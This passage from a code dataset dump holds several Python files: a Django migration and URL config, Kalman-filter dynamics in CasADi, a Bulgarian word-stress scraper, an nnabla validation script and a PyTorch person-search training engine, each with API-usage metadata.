"usage_type": "name"}, {"api_name": "datamodules.CIFAR10DM", "line_number": 118, "usage_type": "call"}, {"api_name": "datamodules.CIFAR100DM", "line_number": 120, "usage_type": "call"}, {"api_name": "datamodules.ImageNetDM", "line_number": 123, "usage_type": "call"}, {"api_name": "datamodules.DanbooruFacesFullDM", "line_number": 126, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 148, "usage_type": "call"}, {"api_name": "wandb.init", "line_number": 149, "usage_type": "call"}, {"api_name": "wandb.run", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 151, "usage_type": "call"}, {"api_name": "pytorch_lightning.seed_everything", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "560999577", "text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n\n # Changing field 'Post.image'\n db.alter_column(u'app_post', 'image', self.gf('pyuploadcare.dj.models.ImageField')())\n\n def backwards(self, orm):\n\n # Changing field 'Post.image'\n db.alter_column(u'app_post', 'image', self.gf('pyuploadcare.dj.models.FileField')())\n\n models = {\n u'app.post': {\n 'Meta': {'object_name': 'Post'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'image': ('pyuploadcare.dj.models.ImageField', [], {}),\n 'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '142', 'blank': 'True'}),\n 'text': ('django.db.models.fields.TextField', [], {}),\n 'title': ('django.db.models.fields.CharField', [], {'max_length': '142'})\n }\n }\n\n complete_apps = ['app']", "sub_path": "app/migrations/0003_auto__chg_field_post_image.py", "file_name": "0003_auto__chg_field_post_image.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "south.v2.SchemaMigration", "line_number": 8, "usage_type": "name"}, {"api_name": "south.db.db.alter_column", "line_number": 13, "usage_type": "call"}, {"api_name": "south.db.db", "line_number": 13, "usage_type": "name"}, {"api_name": "south.db.db.alter_column", "line_number": 18, "usage_type": "call"}, {"api_name": "south.db.db", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "119372435", "text": "# coding: utf8\nfrom django.urls import path\nfrom .views import LocationListView, LocationCreateView, LocationUpdateView, LocationDeleteView\n\nurlpatterns_v1_locations = ([\n\n path('', LocationListView.as_view(), name='list'),\n path('create', LocationCreateView.as_view(), name='create'),\n path('update//', LocationUpdateView.as_view(), name='update'),\n path('delete//', LocationDeleteView.as_view(), name='delete'),\n\n], 'locations')\n", "sub_path": "apps/stations/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 459, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.LocationListView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.LocationListView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.LocationCreateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.LocationCreateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LocationUpdateView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LocationUpdateView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.LocationDeleteView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.LocationDeleteView", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "359328834", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 26 16:39:10 2015\n\nDynamics specifications\n\n@author: plim\n\"\"\"\n\nimport casadi as ca\nimport casadi.tools as cat\nfrom model import *\n\n# %% =========================================================================\n# Extended Kalman filter\n# ============================================================================\n\ndef ext_kalman_filter(belief, control, observation, # current (b, u, z)\n F, dt, A_fcn, h, C_fcn, # dynamics\n Q, obs_cov_fcn): # covariances Q and R(x)\n belief_next = cat.struct_SX(belief)\n \n # Predict the mean\n [mu_bar] = F([ belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = belief['m'].size()\n [z_bar] = h([ mu_bar ])\n belief_next['m'] = mu_bar + ca.mul(K, observation - z_bar)\n belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n \n # (belief, control, observation) -> next_belief\n return ca.SXFunction('Extended Kalman filter',\n [belief,control,observation], [belief_next])\n\n\n# %% =========================================================================\n# Belief dynamics\n# ============================================================================\n\ndef belief_dynamics(belief, control, # current (b, u)\n F, dt, A_fcn, C_fcn, # dynamics\n Q, obs_cov_fcn): # covariances Q and R(x)\n belief_next = cat.struct_SX(belief)\n \n # Predict the mean\n [mu_bar] = F([ belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = belief['m'].size()\n belief_next['m'] = mu_bar\n belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n \n # (belief, control) -> next_belief\n return ca.SXFunction('Belief dynamics',[belief,control],[belief_next])\n\n\n# %% =========================================================================\n# Extended-belief dynamics\n# ============================================================================\ndef ext_belief_dynamics(ext_belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn):\n ext_belief_next = cat.struct_SX(ext_belief)\n \n # Predict the mean\n [mu_bar] = F([ ext_belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ ext_belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, ext_belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = ext_belief['m'].size()\n ext_belief_next['m'] = mu_bar\n ext_belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n ext_belief_next['L'] = ca.mul([ A, ext_belief['L'], A.T ]) + \\\n ca.mul([ K, C, S_bar ])\n \n # (ext_belief, control) -> next_ext_belief\n return ca.SXFunction('Extended-belief dynamics',\n [ext_belief,control],[ext_belief_next])\n\n\n# %% =========================================================================\n# Functions\n# ============================================================================\n\n# Countinuous dynamics x_dot = f(x, u)\nf = continuous_dynamics(state, control)\n\n# Discrete dynamics x_next = F(x, u, dt)\n#F = ca.simpleRK(f, N_rk)\ndt_sym = ca.SX.sym('dt')\nF = ca.SXFunction('Discrete dynamics',\n [state, control, dt_sym],\n [state + dt_sym * f([state, control])[0]])\n\n# Jacobian dx_next/dx\nA_fcn = F.jacobian(0,0)\n\n# Observation function z = h(x)\nh = ca.SXFunction('Observation function',[state],[observation])\n\n# Jacobian dz/dx\nC_fcn = h.jacobian(0,0) \n\n# State-dependent covariance R = R(x)\nobs_cov_fcn = observation_covariance(state, observation)\n\n# Extended Kalman filter b_next = EKF(b, u, z)\nEKF = ext_kalman_filter(belief, control, observation,\n F, dt, A_fcn, h, C_fcn,\n Q, obs_cov_fcn)\n\n# Belief dynamics b_next = BF(b, u)\nBF = belief_dynamics(belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn)\n\n# Extended-belief dynamics (includes L, for plotting purposes)\nEBF = ext_belief_dynamics(ext_belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn)\n\n\n\n\n\n", "sub_path": "src/dynamics.py", "file_name": "dynamics.py", "file_ext": "py", "file_size_in_byte": 5646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "casadi.tools.struct_SX", "line_number": 21, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 21, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 31, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 37, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 38, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 41, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 46, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 47, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 47, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 47, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 50, "usage_type": "call"}, {"api_name": "casadi.tools.struct_SX", "line_number": 61, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 61, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 71, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 77, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 78, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 81, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 86, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 86, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 86, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 89, "usage_type": "call"}, {"api_name": "casadi.tools.struct_SX", "line_number": 98, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 98, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 108, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 114, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 118, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 123, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 123, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 123, "usage_type": "attribute"}, {"api_name": "casadi.mul", "line_number": 124, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "casadi.SXFunction", "line_number": 128, "usage_type": "call"}, {"api_name": "casadi.SX.sym", "line_number": 141, "usage_type": "call"}, {"api_name": "casadi.SX", "line_number": 141, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 142, "usage_type": "call"}, {"api_name": "casadi.SXFunction", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "76685423", "text": "import requests\nimport re\nimport csv\nimport time\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(word):\n url = \"http://ibl.bas.bg/dictionary_portal/lang/bg/all/{}\".format(word)\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'lxml')\n return soup.find_all('blockquote')[0]\n\ndef search_word(word, quote):\n if quote == None:\n return None\n all_possible = permute_accent(word)\n for poss in all_possible:\n reg = re.compile(poss)\n m = reg.search(quote.text)\n if m is not None:\n return m.group(0)\n\n\ndef permute_accent(word):\n vowels = ['и', 'е', 'у', 'о', 'ъ', 'а']\n all_perms= []\n vowel_regex = re.compile(\"[\"+\"\".join(vowels) + \"]\")\n all_vowels = vowel_regex.finditer(word)\n for match in all_vowels:\n\n current_word = word[0:match.start()] +word[match.start()] + u\"\\u0300\" + word[match.end():]\n all_perms.append(current_word)\n\n return all_perms\n\n\ndef get_stress_pattern(word):\n vowels = ['и', 'е', 'у', 'о', 'ъ', 'а']\n pat = \"\"\n if word is None:\n return\n for i,c in enumerate(list(word)):\n try:\n if c in vowels and word[i+1] != u\"\\u0300\":\n pat +='0'\n if c in vowels and word[i+1] == u\"\\u0300\":\n pat += '1'\n continue\n except IndexError:\n if c in vowels:\n pat += '0'\n else:\n continue\n return pat\n\n\ndef get_all():\n all_stress = {}\n with open(\"bg_full.txt\") as f1:\n lines = f1.readlines()\n for line in lines:\n word = re.split(\"\\s\", line)[0]\n stressed_word = search_word(word, get_html(word))\n stress_pattern = get_stress_pattern(stressed_word)\n if stress_pattern is not None:\n all_stress.update({word: stress_pattern})\n time.sleep(0.01)\n return all_stress\n\nall_dict = get_all()\nprint(len(all_dict))\nwith open(\"stresses.txt\", \"w\") as f2:\n for k,v in all_dict.items():\n f2.write(k.strip() + \"\\t\" + v.strip() + \"\\n\")\n\n\n# html = get_html(\"имаме\")\n# print(search_word(\"имаме\", html), \" found\")\n# print(get_stress_pattern(search_word(\"имаме\", html)))", "sub_path": "Bulgarian/Bulgarian_Scraper.py", "file_name": "Bulgarian_Scraper.py", "file_ext": "py", "file_size_in_byte": 2187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.split", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "247656790", "text": "import os\nimport json\nimport argparse\nimport numpy as np\nimport nnabla as nn\nimport nnabla.solvers as S\nimport nnabla.functions as F\nimport nnabla.logger as logger\nfrom nnabla.ext_utils import get_extension_context\n\nimport src.model as model\nfrom .dataset import Dataset\nfrom .grammar import NodeType, Rule, Grammar\nfrom .python.grammar import *\nfrom .decoder import Decoder\nfrom .utils import bleu4\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--context', \"-c\", type=str, default=\"cpu\")\nparser.add_argument(\n '--valid', type=str, default=os.path.join(\"dataset\", \"django\", \"valid\"))\nparser.add_argument('--max-query-length', type=int, default=70)\nparser.add_argument('--max-action-length', type=int, default=100)\nparser.add_argument('--embedding-size', type=int, default=128)\nparser.add_argument('--node-type-embedding-size', type=int, default=64)\nparser.add_argument('--lstm-state-size', type=int, default=256)\nparser.add_argument('--hidden-state-size', type=int, default=50)\nparser.add_argument(\n '--result', type=str, default=os.path.join(\"result\", \"django\"))\nparser.add_argument(\n '--output', type=str, default=os.path.join(\"result\", \"django\", \"valid\"))\nparser.add_argument('--dropout', type=float, default=0.2)\nparser.add_argument('--beam-size', type=int, default=15)\nargs = parser.parse_args()\n\n# Context\nextension_module = args.context\nif args.context is None:\n extension_module = 'cpu'\nlogger.info(\"Running in %s\" % extension_module)\nctx = get_extension_context(extension_module, device_id=0)\nnn.set_default_context(ctx)\n\n# Create directory for output\nif not os.path.exists(args.output):\n os.makedirs(args.output)\n\n# Load grammar info\nlogger.info(\"Load grammar/words info\")\nwith open(os.path.join(args.result, \"words.json\")) as f:\n word_to_id = json.load(f)\nwith open(os.path.join(args.result, \"tokens.json\")) as f:\n tokens = json.load(f)\nwith open(os.path.join(args.result, \"rules.json\")) as f:\n rules = json.load(f)\n rules = list(map(Rule.from_json, rules))\nwith open(os.path.join(args.result, \"node_types.json\")) as f:\n node_types = json.load(f)\n node_types = list(map(NodeType.from_json, node_types))\ngrammar = Grammar(node_types, rules, tokens)\n\n# Load dataset\nlogger.info(\"Load dataset\")\ndata = Dataset(args.valid, shuffle=False)\ndata.prepare(word_to_id, grammar)\n\nlogger.info(\"Create monitors\")\nimport nnabla.monitor as M\nmonitor = M.Monitor(args.output)\nmonitor_vacc = M.MonitorSeries(\"validation-accuracy\", monitor, interval=1)\nmonitor_vbleu4 = M.MonitorSeries(\"validation-bleu4\", monitor, interval=1)\n\nlogger.info(\"Load parameter\")\nnn.load_parameters(os.path.join(args.result, \"model.h5\"))\n\nlogger.info(\"Prepare decoder\")\ndecoder = Decoder(args.beam_size, args.max_query_length,\n args.max_action_length, word_to_id, grammar,\n args.embedding_size, args.node_type_embedding_size,\n args.lstm_state_size, args.hidden_state_size, args.dropout)\n\nimport transpyle\nunparser = transpyle.python.unparser.NativePythonUnparser()\n# validation\nsum_bleu4 = 0.0\nacc = 0.0\nN = 0\nfor i in range(data.size):\n if i % 10 == 0:\n logger.info(\"valid : {} / {} samples\".format(i, data.size))\n sample = data.next()\n\n length = min(args.max_query_length, len(sample.encoder_input.query))\n if len(sample.sequence) > args.max_action_length:\n continue\n\n valid = False\n try:\n reference = unparser.unparse(to_ast(sample.sequence))\n valid = True\n N += 1\n except RuntimeError as e:\n pass\n\n if valid:\n h = decoder.decode(sample.annotation, sample.encoder_input)\n try:\n if not (h is None):\n result = unparser.unparse(to_ast(h.sequence))\n if result == reference:\n acc += 1.0\n sum_bleu4 += bleu4(reference, result)\n except:\n pass\nacc /= N\nsum_bleu4 /= N\nmonitor_vacc.add(1, acc)\nmonitor_vbleu4.add(1, sum_bleu4)\n", "sub_path": "src/valid.py", "file_name": "valid.py", "file_ext": "py", "file_size_in_byte": 3960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 40, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 40, "usage_type": "name"}, {"api_name": "nnabla.ext_utils.get_extension_context", "line_number": 41, "usage_type": "call"}, {"api_name": "nnabla.set_default_context", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 49, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "grammar.Rule.from_json", "line_number": 56, "usage_type": "attribute"}, {"api_name": "grammar.Rule", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 58, "usage_type": "call"}, {"api_name": "grammar.NodeType.from_json", "line_number": 59, "usage_type": "attribute"}, {"api_name": "grammar.NodeType", "line_number": 59, "usage_type": "name"}, {"api_name": "grammar.Grammar", "line_number": 60, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "dataset.Dataset", "line_number": 64, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 67, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 67, "usage_type": "name"}, {"api_name": "nnabla.monitor.Monitor", "line_number": 69, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 69, "usage_type": "name"}, {"api_name": "nnabla.monitor.MonitorSeries", "line_number": 70, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 70, "usage_type": "name"}, {"api_name": "nnabla.monitor.MonitorSeries", "line_number": 71, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 71, "usage_type": "name"}, {"api_name": "nnabla.logger.info", "line_number": 73, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 73, "usage_type": "name"}, {"api_name": "nnabla.load_parameters", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 76, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 76, "usage_type": "name"}, {"api_name": "decoder.Decoder", "line_number": 77, "usage_type": "call"}, {"api_name": "transpyle.python.unparser.NativePythonUnparser", "line_number": 83, "usage_type": "call"}, {"api_name": "transpyle.python", "line_number": 83, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 90, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 90, "usage_type": "name"}, {"api_name": "decoder.decode", "line_number": 106, "usage_type": "call"}, {"api_name": "utils.bleu4", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "148952638", "text": "import math\r\nimport sys\r\nfrom copy import deepcopy\r\n\r\nimport torch\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom tqdm import tqdm\r\n\r\nfrom eval_func import eval_detection, eval_search_cuhk, eval_search_prw, eval_search_mvn\r\nfrom utils.utils import (\r\n MetricLogger,\r\n SmoothedValue,\r\n is_main_process,\r\n mkdir,\r\n reduce_dict,\r\n warmup_lr_scheduler,\r\n)\r\nfrom config import ConfigMVN\r\n\r\ndef to_device(images, targets, device):\r\n images = [image.to(device) for image in images]\r\n for t in targets:\r\n t[\"boxes\"] = t[\"boxes\"].to(device)\r\n t[\"labels\"] = t[\"labels\"].to(device)\r\n return images, targets\r\n\r\n\r\ndef train_one_epoch(cfg, model, optimizer, data_loader, device, epoch, tfboard=None):\r\n model.train()\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n metric_logger.add_meter(\"lr\", SmoothedValue(window_size=1, fmt=\"{value:.6f}\"))\r\n header = \"Epoch: [{}]\".format(epoch)\r\n\r\n # warmup learning rate in the first epoch\r\n if epoch == 0 and True:\r\n warmup_factor = 1.0 / 1000\r\n # FIXME: min(1000, len(data_loader) - 1)\r\n warmup_iters = len(data_loader) - 1\r\n warmup_scheduler = warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)\r\n\r\n for i, (images, targets) in enumerate(\r\n metric_logger.log_every(data_loader, cfg.DISP_PERIOD, header)\r\n ):\r\n\r\n if False:\r\n # show the image with annotations to check\r\n import matplotlib.pyplot as plt\r\n from PIL import Image\r\n import os\r\n import cv2\r\n import numpy as np\r\n for im, tgt in zip(images, targets):\r\n print(\"images:\", type(im), im.shape, im)\r\n print(\"targets:\", type(tgt), tgt)\r\n image = (np.array(im.cpu().numpy().transpose(1, 2, 0)) * 255).astype(np.uint8)\r\n image_tgt = (np.array(Image.open(os.path.join('/home/pengzheng/datasets/ps/mvn/frames', tgt['img_name'])).convert('RGB')) * 1).astype(np.uint8)\r\n boxes = tgt['boxes']\r\n labels = tgt['labels']\r\n for box, lbl in zip(boxes, labels):\r\n x1, y1, x2, y2 = box\r\n cv2.rectangle(image_tgt, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.putText(image_tgt, str(lbl), (x1, y1+50), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 0, 0), 1, cv2.LINE_AA)\r\n plt.imshow(image)\r\n plt.figure()\r\n plt.imshow(image_tgt)\r\n plt.show()\r\n # break\r\n images, targets = to_device(images, targets, device)\r\n\r\n loss_dict = model(images, targets)\r\n losses = sum(loss for loss in loss_dict.values())\r\n\r\n # reduce losses over all GPUs for logging purposes\r\n loss_dict_reduced = reduce_dict(loss_dict)\r\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\r\n loss_value = losses_reduced.item()\r\n\r\n if not math.isfinite(loss_value):\r\n print(f\"Loss is {loss_value}, stopping training\")\r\n print(loss_dict_reduced)\r\n sys.exit(1)\r\n\r\n optimizer.zero_grad()\r\n losses.backward()\r\n if cfg.SOLVER.CLIP_GRADIENTS > 0:\r\n clip_grad_norm_(model.parameters(), cfg.SOLVER.CLIP_GRADIENTS)\r\n optimizer.step()\r\n\r\n if epoch == 0 and True:\r\n warmup_scheduler.step()\r\n\r\n metric_logger.update(loss=loss_value, **loss_dict_reduced)\r\n metric_logger.update(lr=optimizer.param_groups[0][\"lr\"])\r\n if tfboard and is_main_process():\r\n iter = epoch * len(data_loader) + i\r\n for k, v in loss_dict_reduced.items():\r\n tfboard.add_scalars(\"train\", {k: v}, iter)\r\n\r\n\r\n@torch.no_grad()\r\ndef evaluate_performance(\r\n model, gallery_loader, query_loader, device, use_gt=False, use_cache=False, use_cbgm=False\r\n):\r\n \"\"\"\r\n Args:\r\n use_gt (bool, optional): Whether to use GT as detection results to verify the upper\r\n bound of person search performance. Defaults to False.\r\n use_cache (bool, optional): Whether to use the cached features. Defaults to False.\r\n use_cbgm (bool, optional): Whether to use Context Bipartite Graph Matching algorithm.\r\n Defaults to False.\r\n \"\"\"\r\n model.eval()\r\n if use_cache:\r\n eval_cache = torch.load(\"data/eval_cache/eval_cache.pth\")\r\n gallery_dets = eval_cache[\"gallery_dets\"]\r\n gallery_feats = eval_cache[\"gallery_feats\"]\r\n query_dets = eval_cache[\"query_dets\"]\r\n query_feats = eval_cache[\"query_feats\"]\r\n query_box_feats = eval_cache[\"query_box_feats\"]\r\n else:\r\n gallery_dets, gallery_feats = [], []\r\n for images, targets in tqdm(gallery_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n if not use_gt:\r\n outputs = model(images)\r\n else:\r\n boxes = targets[0][\"boxes\"]\r\n n_boxes = boxes.size(0)\r\n embeddings = model(images, targets)\r\n outputs = [\r\n {\r\n \"boxes\": boxes,\r\n \"embeddings\": torch.cat(embeddings),\r\n \"labels\": torch.ones(n_boxes).to(device),\r\n \"scores\": torch.ones(n_boxes).to(device),\r\n }\r\n ]\r\n\r\n for output in outputs:\r\n box_w_scores = torch.cat([output[\"boxes\"], output[\"scores\"].unsqueeze(1)], dim=1)\r\n gallery_dets.append(box_w_scores.cpu().numpy())\r\n gallery_feats.append(output[\"embeddings\"].cpu().numpy())\r\n\r\n # regarding query image as gallery to detect all people\r\n # i.e. query person + surrounding people (context information)\r\n query_dets, query_feats = [], []\r\n for images, targets in tqdm(query_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n # targets will be modified in the model, so deepcopy it\r\n outputs = model(images, deepcopy(targets), query_img_as_gallery=True)\r\n\r\n # consistency check\r\n gt_box = targets[0][\"boxes\"].squeeze()\r\n assert (\r\n gt_box - outputs[0][\"boxes\"][0]\r\n ).sum() <= 0.001, \"GT box must be the first one in the detected boxes of query image\"\r\n\r\n for output in outputs:\r\n box_w_scores = torch.cat([output[\"boxes\"], output[\"scores\"].unsqueeze(1)], dim=1)\r\n query_dets.append(box_w_scores.cpu().numpy())\r\n query_feats.append(output[\"embeddings\"].cpu().numpy())\r\n\r\n # extract the features of query boxes\r\n query_box_feats = []\r\n for images, targets in tqdm(query_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n embeddings = model(images, targets)\r\n assert len(embeddings) == 1, \"batch size in test phase should be 1\"\r\n query_box_feats.append(embeddings[0].cpu().numpy())\r\n\r\n mkdir(\"data/eval_cache\")\r\n save_dict = {\r\n \"gallery_dets\": gallery_dets,\r\n \"gallery_feats\": gallery_feats,\r\n \"query_dets\": query_dets,\r\n \"query_feats\": query_feats,\r\n \"query_box_feats\": query_box_feats,\r\n }\r\n torch.save(save_dict, \"data/eval_cache/eval_cache.pth\")\r\n\r\n eval_detection(gallery_loader.dataset, gallery_dets, det_thresh=0.01)\r\n if gallery_loader.dataset.name == \"CUHK-SYSU\":\r\n eval_search_cuhk(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n gallery_size=100,\r\n )\r\n elif gallery_loader.dataset.name == \"PRW\":\r\n eval_search_prw(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n )\r\n elif gallery_loader.dataset.name == \"MVN\":\r\n eval_search_mvn(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n gallery_size=ConfigMVN().gallery_size,\r\n )\r\n", "sub_path": "engine.py", "file_name": "engine.py", "file_ext": "py", "file_size_in_byte": 8577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.utils.MetricLogger", 